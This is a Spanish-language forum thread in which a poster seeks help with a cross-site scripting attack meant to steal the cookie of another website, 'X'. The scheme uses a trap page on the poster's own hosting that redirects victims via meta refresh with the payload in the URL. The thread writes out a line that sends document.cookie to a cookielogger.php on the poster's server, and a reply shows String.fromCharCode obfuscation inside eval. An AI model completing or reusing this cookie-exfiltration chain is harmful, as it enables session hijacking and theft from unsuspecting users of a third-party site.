Voy de problema en problema 

Gracias a el método de yeikos he conseguido que me cargue las funciones del javascript con letras. Vale os voy a explicar así un poco para que sepaís que pretendo hacer:

Tengo una web "X" a la que le quiero sacar la cookie. Como en el foro no puedo utilizar <script></script>, se me ocurrió poner un link a un servidor mío a una página "Y" que con un meta refresh redirija a la página "X" pero con el XSS ya introducido en la URL.

Vale hasta ahora bien, todo funciona perfectamente hasta que llega a la mitad del script:


Vale el document.location lo realiza correctamente porque me redirige a cookielogger.php pero la cookie no aparece por ningún lado. Le he puesto un print para comprobarlo y me aparace ==> document.cookie. La cookie sigue desaparecida x'D

También he probdo con document.location=http://miweb.com/cookielogger.php?cookie= document.cookie, pero nada me sigue apareciendo document.cookie en vez de la cookie.

Me he quemado ya la cabeza de tanto pensar en que puede fallar y no se qué es, haber si me podéis echar una mano. Se me ha ocurrido de que al irse a mi hosting al no haber cookie no me la muestre, pero como le hago el location al otro hosting sí debería de aparecer :S no se, estoy confuso :S

Gracias por la respuesta pero no me ha valido o no he sabido colocarlo 

Si queréis ver lo que sale el link de la web "trampa" que redirige está en www.pspandopower.com/prueba/index.php

Es una web de un hosting mio, por lo que estará permitido que lo ponga no?

claro que esta mal xD


Creo que tendre que poner bien mis ejemplos de ahora en adelante, ya van com 3 que me corriges xDDD


bien...

---

Me refiero a que con la "funcion" que pones, lo ponga dentro del eval...
o sea (espero no equivocarme de nuevo xDDD)

eval(String.fromCharCode(97,108,101,114,116,40,39,104,111,108,97,39,41,59));
 

claro, con las instrucciones correspondientes